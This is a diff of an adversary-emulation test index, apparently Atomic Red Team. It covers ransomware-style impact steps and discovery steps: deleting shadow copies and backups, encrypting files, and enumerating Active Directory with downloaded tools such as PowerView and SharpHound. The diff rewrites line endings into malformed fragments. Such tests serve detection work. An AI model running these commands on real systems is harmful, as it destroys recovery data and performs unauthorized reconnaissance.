@@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi -' + ' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located -' + ' prereq_command: 'which_openssl=`which openssl` -' + ' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt -' + ' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 -' + ' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. -' + ' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'vssadmin.exe create shadow /for=c: -' + ' executor: command: 'vssadmin.exe delete shadows /all /quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair 
@@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} -' + ' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. -' + ' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 -' + ' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task -' + ' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable -' + ' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. -' + ' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null -' + ' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} -' + ' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe 
@@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} -' + ' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} -' + ' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. -' + ' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} -' + ' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. -' + ' supported_platforms: - macos - linux 
@@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} -' + ' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. -' + ' supported_platforms: - macos - linux executor: command: 'reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt -p -' + ' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt --reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff -' + ' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff --reboot -' + ' name: bash elevation_required: true T1565.002: 
@@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) -' + ' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 -' + ' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: 
@@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force -' + ' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks -' + ' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite -' + ' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites -' + ' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} -' + ' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 
@@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) -' + ' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} -' + ' executor: command: 'Invoke-Expression #{adrecon_path} -' + ' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt 
@@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account -' + ' supported_platforms: - windows executor: command: 'net user administrator /domain -' + ' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed -' + ' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} -' + ' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name -' + ' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 
@@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. -' + ' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. -' + ' - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} -' + ' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | 
@@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * -' + ' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk -' + ' prereq_command: 'WHERE nltest.exe >NUL 2>&1 -' + ' get_prereq_command: 'echo Sorry RSAT must be installed manually -' + ' executor: command: 'nltest /domain_trusts -' + ' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk -' + ' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" -' + ' - description: 'RSAT PowerShell AD admin cmdlets must be installed -' + ' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" -' + ' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" 
@@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system -' + ' supported_platforms: - macos - linux 
@@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file -' + ' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 -' + ' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user -' + ' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username -' + ' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely -' + ' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get install login; exit 1; -' + ' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups -' + ' supported_platforms: - linux - macos 
@@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups -' + ' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. -' + ' supported_platforms: - windows executor: command: 'query user -' + ' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery -' + ' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) -' + ' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" -' + ' executor: name: powershell elevation_required: false 
@@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore -' + ' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'wmic.exe group get name -' + ' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group -' + ' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed -' + ' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python -' + ' supported_platforms: - windows input_arguments: 
@@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' executor: command: 'python #(unknown) -i #{host_ip} -' + ' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery -' + ' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus -' + ' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares -' + ' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} -' + ' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare -' + ' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae 
@@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share -' + ' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain -' + ' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: '"Join system to domain" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 -' + ' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: 
@@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. -' + ' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v7 -' + ' executor: command: 'cat /etc/security/pwquality.conf -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v6 -' + ' executor: command: | cat /etc/pam.d/system-auth 
@@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. -' + ' supported_platforms: - linux executor: command: 'cat /etc/login.defs -' + ' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts -' + ' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts /domain -' + ' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. -' + ' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist -' + ' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain -' + ' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} -' + ' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 
